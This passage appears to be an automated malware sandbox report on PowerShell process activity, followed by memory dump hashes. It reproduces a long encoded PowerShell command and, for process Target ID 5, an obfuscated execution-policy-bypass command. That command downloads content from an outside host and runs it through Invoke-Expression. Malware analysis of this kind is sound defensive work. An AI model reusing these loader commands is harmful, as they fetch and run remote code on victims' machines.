AoAGIARABYAHYAVgAoADAAeAAyAGUAKQApACsAKABiAEQAWAB2AFYAKAAwAHgAMgA4ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADIAOAApACkAKwAoAGIARABYAHYAVgAoADAAeAA1ADYAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgAxACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADcAMgApACkAKwAoAGIARABYAHYAVgAoADAAeAA2ADkAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgAxACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYAMgApACkAKwAoAGIARABYAHYAVgAoADAAeAA2AGMAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgA1ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADIAMAApACkAKwAoAGIARABYAHYAVgAoADAAeAAzADMAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgA4ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADIAMAApACkAKwAoAGIARABYAHYAVgAoADAAeAAyAGQAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANQA2ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYAMQApACkAKwAoAGIARABYAHYAVgAoADAAeAA2AGMAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANwA1ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYANQApACkAKwAoAGIARABYAHYAVgAoADAAeAA0AGYAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgBlACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYAYwApACkAKwAoAGIARABYAHYAVgAoADAAeAAyADkAKQApACsAKABiAEQAWAB2AFYAKAAwAHgAMgA5ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADIAOAApACkAKwAoAGIARABYAHYAVgAoADAAeAAyADgAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANAA5ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADcANAApACkAKwAoAGIARABYAHYAVgAoADAAeAA2ADUAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgBkACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADIAMAApACkAKwAoAGIARABYAHYAVgAoADAAeAA1ADYAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgAxACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADcAMgApACkAKwAoAGIARABYAHYAVgAoADAAeAA2ADkAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgAxACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYAMgApACkAKwAoAGIARABYAHYAVgAoADAAeAA2AGMAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgA1ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADMAYQApACkAKwAoAGIARABYAHYAVgAoADAAeAA1AGMAKQApACsAKABiAEQAWAB2AFYAKAAwAHgAMwA3ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYAYgApACkAKwAoAGIARABYAHYAVgAoADAAeAA0AGQAKQApACsAKABiAEQAWAB2AFYAKAAwAHgAMgA5ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADIAZQApACkAKwAoAGIARABYAHYAVgAoADAAeAA1ADYAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgAxACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYAYwApACkAKwAoAGIARABYAHYAVgAoADAAeAA3ADUAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgA1ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADIAOQApACkAKwAoAGIARABYAHYAVgAoADAAeAA3AGMAKQApACsAKABiAEQAWAB2AFYAKAAwAHgAMgA2ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADIAOAApACkAKwAoAGIARABYAHYAVgAoADAAeAA0ADcAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANQA2ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADIAMAApACkAKwAoAGIARABYAHYAVgAoADAAeAAyAGEAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANwA1ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADcANAApACkAKwAoAGIARABYAHYAVgAoADAAeAA2ADkAKQApACsAKABiAEQAWAB2AFYAKAAwAHgAMgBhACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADcANAApACkAKwAoAGIARABYAHYAVgAoADAAeAAyADkAKQApACsAKABiAEQAWAB2AFYAKAAwAHgAMgBlACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADUANgApACkAKwAoAGIARABYAHYAVgAoADAAeAA2ADEAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgBjACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADcANQApACkAKwAoAGIARABYAHYAVgAoADAAeAA2ADUAKQApACsAKABiAEQAWAB2AFYAKAAwAHgAMgBlACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADQAOQApACkAKwAoAGIARABYAHYAVgAoADAAeAA2AGUAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANwA2ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYAZgApACkAKwAoAGIARABYAHYAVgAoADAAeAA2AGIAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgA1ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADQAMwApACkAKwAoAGIARABYAHYAVgAoADAAeAA2AGYAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgBkACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYAZAApACkAKwAoAGIARABYAHYAVgAoADAAeAA2ADEAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgBlACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYANAApACkAKwAoAGIARABYAHYAVgAoADAAeAAyAGUAKQApACsAKABiAEQAWAB2AFYAKAAwAHgAMgA4ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADIAOAApACkAKwAoAGIARABYAHYAVgAoADAAeAAyADgAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANAA3ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADUANgApACkAKwAoAGIARABYAHYAVgAoADAAeAAyADAAKQApACsAKABiAEQAWAB2AFYAKAAwAHgAMgBhACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADcANQApACkAKwAoAGIARABYAHYAVgAoADAAeAA3ADQAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgA5ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADIAYQApACkAKwAoAGIARABYAHYAVgAoADAAeAA3ADQAKQApACsAKABiAEQAWAB2AFYAKAAwAHgAMgA5ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADIAZQApACkAKwAoAGIARABYAHYAVgAoADAAeAA1ADYAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgAxACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYAYwApACkAKwAoAGIARABYAHYAVgAoADAAeAA3ADUAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgA1ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADIAZQApACkAKwAoAGIARABYAHYAVgAoADAAeAA0ADkAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgBlACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADcANgApACkAKwAoAGIARABYAHYAVgAoADAAeAA2AGYAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgBiACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYANQApACkAKwAoAGIARABYAHYAVgAoADAAeAA0ADMAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgBmACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYAZAApACkAKwAoAGIARABYAHYAVgAoADAAeAA2AGQAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgAxACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYAZQApACkAKwAoAGIARABYAHYAVgAoADAAeAA2ADQAKQApACsAKABiAEQAWAB2AFYAKAAwAHgAMgBlACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADUAMAApACkAKwAoAGIARABYAHYAVgAoADAAeAA3ADMAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANABmACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYAMgApACkAKwAoAGIARABYAHYAVgAoADAAeAA2AGEAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgA1ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYAMwApACkAKwAoAGIARABYAHYAVgAoADAAeAA3ADQAKQApACsAKABiAEQAWAB2AFYAKAAwAHgAMgBlACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADQAZAApACkAKwAoAGIARABYAHYAVgAoADAAeAA2ADUAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANwA0ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYAOAApACkAKwAoAGIARABYAHYAVgAoADAAeAA2AGYAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgA0ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADcAMwApACkAKwAoAGIARABYAHYAVgAoADAAeAA3AGMAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANQA3ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYAOAApACkAKwAoAGIARABYAHYAVgAoADAAeAA2ADUAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANwAyACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYANQApACkAKwAoAGIARABYAHYAVgAoADAAeAA3AGIAKQApACsAKABiAEQAWAB2AFYAKAAwAHgAMgA4ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADUANgApACkAKwAoAGIARABYAHYAVgAoADAAeAA2ADEAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANwAyACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYAOQApACkAKwAoAGIARABYAHYAVgAoADAAeAA2ADEAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgAyACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYAYwApACkAKwAoAGIARABYAHYAVgAoADAAeAA2ADUAKQApACsAKABiAEQAWAB2AFYAKAAwAHgAMgAwACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADUAZgApACkAKwAoAGIARABYAHYAVgAoADAAeAAyADAAKQApACsAKABiAEQAWAB2AFYAKAAwAHgAMgBkACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADUANgApACkAKwAoAGIARABYAHYAVgAoADAAeAA2ADEAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgBjACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADcANQApACkAKwAoAGIARABYAHYAVgAoADAAeAA2ADUAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANABmACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYAZQApACkAKwAoAGIARABYAHYAVgAoADAAeAAyADkAKQApACsAKABiAEQAWAB2AFYAKAAwAHgAMgBlACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADQAZQApACkAKwAoAGIARABYAHYAVgAoADAAeAA2ADEAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgBkACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYANQApACkAKwAoAGIARABYAHYAVgAoADAAeAAyADAAKQApACsAKABiAEQAWAB2AFYAKAAwAHgAMgBkACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYAYwApACkAKwAoAGIARABYAHYAVgAoADAAeAA2ADkAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgBiACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYANQApACkAKwAoAGIARABYAHYAVgAoADAAeAAyADcAKQApACsAKABiAEQAWAB2AFYAKAAwAHgAMgA3ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADIAYQApACkAKwAoAGIARABYAHYAVgAoADAAeAA0ADMAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgBmACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADIAYQApACkAKwAoAGIARABYAHYAVgAoADAAeAA2ADQAKQApACsAKABiAEQAWAB2AFYAKAAwAHgAMgA3ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADIANwApACkAKwAoAGIARABYAHYAVgAoADAAeAA3AGQAKQApACsAKABiAEQAWAB2AFYAKAAwAHgAMgA5ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADIAZQApACkAKwAoAGIARABYAHYAVgAoADAAeAA0AGUAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgAxACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYAZAApACkAKwAoAGIARABYAHYAVgAoADAAeAA2ADUAKQApACsAKABiAEQAWAB2AFYAKAAwAHgAMgA5ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADIAOAApACkAKwAoAGIARABYAHYAVgAoADAAeAAyADgAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANAA3ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADUANgApACkAKwAoAGIARABYAHYAVgAoADAAeAAyADAAKQApACsAKABiAEQAWAB2AFYAKAAwAHgAMgBhACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADcANQApACkAKwAoAGIARABYAHYAVgAoADAAeAA3ADQAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgA5ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADIAYQApACkAKwAoAGIARABYAHYAVgAoADAAeAA3ADQAKQApACsAKABiAEQAWAB2AFYAKAAwAHgAMgA5ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADIAZQApACkAKwAoAGIARABYAHYAVgAoADAAeAA1ADYAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgAxACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYAYwApACkAKwAoAGIARABYAHYAVgAoADAAeAA3ADUAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgA1ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADIAZQApACkAKwAoAGIARABYAHYAVgAoADAAeAA0ADkAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgBlACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADcANgApACkAKwAoAGIARABYAHYAVgAoADAAeAA2AGYAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgBiACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYANQApACkAKwAoAGIARABYAHYAVgAoADAAeAA0ADMAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgBmACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYAZAApACkAKwAoAGIARABYAHYAVgAoADAAeAA2AGQAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgAxACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYAZQApACkAKwAoAGIARABYAHYAVgAoADAAeAA2ADQAKQApACsAKABiAEQAWAB2AFYAKAAwAHgAMgBlACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADQANwApACkAKwAoAGIARABYAHYAVgAoADAAeAA2ADUAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANwA0ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADQAMwApACkAKwAoAGIARABYAHYAVgAoADAAeAA2AGYAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgBkACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYAZAApACkAKwAoAGIARABYAHYAVgAoADAAeAA2ADEAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgBlACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYANAApACkAKwAoAGIARABYAHYAVgAoADAAeAA0AGUAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgAxACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYAZAApACkAKwAoAGIARABYAHYAVgAoADAAeAA2ADUAKQApACsAKABiAEQAWAB2AFYAKAAwAHgAMgA4ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADIANwApACkAKwAoAGIARABYAHYAVgAoADAAeAAyADcAKQApACsAKABiAEQAWAB2AFYAKAAwAHgAMgBhACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYANQApACkAKwAoAGIARABYAHYAVgAoADAAeAAyAGQAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANAA1ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADcAOAApACkAKwAoAGIARABYAHYAVgAoADAAeAAyAGEAKQApACsAKABiAEQAWAB2AFYAKAAwAHgAMgA3ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADIANwApACkAKwAoAGIARABYAHYAVgAoADAAeAAyAGMAKQApACsAKABiAEQAWAB2AFYAKAAwAHgAMwAxACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADIAYwApACkAKwAoAGIARABYAHYAVgAoADAAeAAyADQAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANQA0ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADUAMgApACkAKwAoAGIARABYAHYAVgAoADAAeAA1ADUAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANAA1ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADIAOQApACkAKwAoAGIARABYAHYAVgAoADAAeAAyAGMAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANQBiACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADQAZAApACkAKwAoAGIARABYAHYAVgAoADAAeAA2ADEAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgBlACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYAMQApACkAKwAoAGIARABYAHYAVgAoADAAeAA2ADcAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgA1ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYAZAApACkAKwAoAGIARABYAHYAVgAoADAAeAA2ADUAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgBlACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADcANAApACkAKwAoAGIARABYAHYAVgAoADAAeAAyAGUAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANAAxACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADcANQApACkAKwAoAGIARABYAHYAVgAoADAAeAA3ADQAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgBmACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYAZAApACkAKwAoAGIARABYAHYAVgAoADAAeAA2ADEAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANwA0ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYAOQApACkAKwAoAGIARABYAHYAVgAoADAAeAA2AGYAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgBlACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADIAZQApACkAKwAoAGIARABYAHYAVgAoADAAeAA0ADMAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgBmACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYAZAApACkAKwAoAGIARABYAHYAVgAoADAAeAA2AGQAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgAxACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYAZQApACkAKwAoAGIARABYAHYAVgAoADAAeAA2ADQAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANQA0ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADcAOQApACkAKwAoAGIARABYAHYAVgAoADAAeAA3ADAAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgA1ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADcAMwApACkAKwAoAGIARABYAHYAVgAoADAAeAA1AGQAKQApACsAKABiAEQAWAB2AFYAKAAwAHgAMwBhACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADMAYQApACkAKwAoAGIARABYAHYAVgAoADAAeAA0ADMAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgBkACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYANAApACkAKwAoAGIARABYAHYAVgAoADAAeAA2AGMAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgA1ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADcANAApACkAKwAoAGIARABYAHYAVgAoADAAeAAyADkAKQApACsAKABiAEQAWAB2AFYAKAAwAHgAMgA3ACkAKQApAA==
                                                      Imagebase:0x7ff64a690000
                                                      File size:452'608 bytes
                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true
                                                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                                      Target ID:5
                                                      Start time:15:59:38
                                                      Start date:21/04/2025
                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -NoP -Ex Bypass -C Set-Item Variable:7kM 'https://qqcxq1.dyheg.fun/7721972eb8e100d6923d14a4173e8f144785818bbaeca7b9.accdt';SI Variable:\C ([Net.WebClient]::New());Set-Variable 3h (((([Net.WebClient]::New()|Member)|Where{(Variable _ -ValueOn).Name -like'D*g'}).Name));(Variable C -Value).((Variable 3h -ValueOnl))((Item Variable:\7kM).Value)|&(GV *uti*t).Value.InvokeCommand.(((GV *uti*t).Value.InvokeCommand.PsObject.Methods|Where{(Variable _ -ValueOn).Name -like'*Co*d'}).Name)((GV *uti*t).Value.InvokeCommand.GetCommandName('*e-Ex*',1,$TRUE),[Management.Automation.CommandTypes]::Cmdlet)
                                                      Imagebase:0x6f0000
                                                      File size:433'152 bytes
                                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:6
                                                      Start time:15:59:38
                                                      Start date:21/04/2025
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff6e6aa0000
                                                      File size:875'008 bytes
                                                      MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Executed Functions

                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.65051202956.00007FFC39140000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC39140000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_7ffc39140000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: abec2792b95cc3134e75351a9277a07185e0420c5c5f3ff60835923a31afeda3
                                                      • Instruction ID: e0f88b804c097e868fbf0394ddf0c8f644a6de57248081032c1f1b710905a641
                                                      • Opcode Fuzzy Hash: abec2792b95cc3134e75351a9277a07185e0420c5c5f3ff60835923a31afeda3
                                                      • Instruction Fuzzy Hash: 9301A73110CB0C4FD744EF0CE451AA5B7E0FB89320F50052DE58AC3691DA32E892CB45

                                                      Executed Functions

                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.65014288020.00007FFC39150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC39150000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_7ffc39150000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 36e879b52527cf9c0831b621c126732d1c6f159b4781d2086e37170df1838c7a
                                                      • Instruction ID: a760bd7ddc11fa7f789e0d8e7d40118901c7edb583891e0acc4f494e03bf2a98
                                                      • Opcode Fuzzy Hash: 36e879b52527cf9c0831b621c126732d1c6f159b4781d2086e37170df1838c7a
                                                      • Instruction Fuzzy Hash: 2401A73010CB0C8FD744EF0CE451AA5B7E0FB85320F10052DE58AC36A1DA32E892CB45

                                                      Non-executed Functions

                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.65014288020.00007FFC39150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC39150000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_7ffc39150000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 032e3122213b03d1012939cebc84bf02abb060563872530f9dd1d912b07b2c5f
                                                      • Instruction ID: 6133bad34345346aece1ceea760c1cc9eaa7e9484daeeaedae8abd21ebc79688
                                                      • Opcode Fuzzy Hash: 032e3122213b03d1012939cebc84bf02abb060563872530f9dd1d912b07b2c5f
                                                      • Instruction Fuzzy Hash: 1C41E25390D7EB9AEB139B2C58610E57FA0EF63750B0A25F7C0D48A883DA192807E374

                                                      Executed Functions

                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.65020165623.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_76b0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6074bbd9d080e90fb1d6df6461e2e920074da3fff8bdb3bfb202a36300fd769a
                                                      • Instruction ID: c5e802bcf611fc4ac9c652afefa12ba57782f5af3cdd3c1a2db4c47612f75506
                                                      • Opcode Fuzzy Hash: 6074bbd9d080e90fb1d6df6461e2e920074da3fff8bdb3bfb202a36300fd769a
                                                      • Instruction Fuzzy Hash: 1C1225B5B042458FC725DB7AC4506AABBB6EFC7210B14C07BD54ACB356DB32D882C7A1
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.65020165623.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_76b0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b3bb36223450635686b58072f8001f1970ec1752f08e0e84c52fadf872f26a78
                                                      • Instruction ID: e18d73494f79fa62d9dfcb80ee07110a1ae923f682480af29bfd0710db8cdb03
                                                      • Opcode Fuzzy Hash: b3bb36223450635686b58072f8001f1970ec1752f08e0e84c52fadf872f26a78
                                                      • Instruction Fuzzy Hash: B2D14BB570024ABBDB3C9A7488207EA7BA69F93650F14807AD506CB395DB71CDC2C752
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.65020165623.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_76b0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 42a826ef18caee70723f277c640cf9159b3b36ec8505c48a89c553a79253125c
                                                      • Instruction ID: 1007f5e8f1698eef044d38afe733ff601cf7887a7c75924d8ae145b342251354
                                                      • Opcode Fuzzy Hash: 42a826ef18caee70723f277c640cf9159b3b36ec8505c48a89c553a79253125c
                                                      • Instruction Fuzzy Hash: EDD1A2B4B01209EFDB14DBA4C450BDEBBB2AF86714F648468E5056F345CB72EC82CB95
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.65020165623.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_76b0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6a754da22080f21406c2e0b4727f7f931139cce680a607b3041dc1cf307ef79c
                                                      • Instruction ID: c0337af8a8200e9e032b3361fc56e5da43f6679e8262832230e899da1dd4c7c1
                                                      • Opcode Fuzzy Hash: 6a754da22080f21406c2e0b4727f7f931139cce680a607b3041dc1cf307ef79c
                                                      • Instruction Fuzzy Hash: 58B18EB4B00205AFDB14DF64C440BDEBBB2AF86714F248169E9056F395CB32EC82CB95
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.65012973950.0000000006BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_6ba0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 55ad7535f2460c20fb120191ddbe2f0c4dd7b4e541a308b93dcc9718d471471f
                                                      • Instruction ID: 8a8f065f85ee87d9e8f7e2dec665ce172dfceb729af5a3d1c101ae2da37ae2df
                                                      • Opcode Fuzzy Hash: 55ad7535f2460c20fb120191ddbe2f0c4dd7b4e541a308b93dcc9718d471471f
                                                      • Instruction Fuzzy Hash: 5291AF70A04209DFCB45CF98C594AAEFBB2FF48310B28819AD455AB365D335FD91CBA1
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.65020165623.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_76b0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 1fc19126c176037180c3fa50f59ffc455ab81192e91ab82831a11d622a15a08c
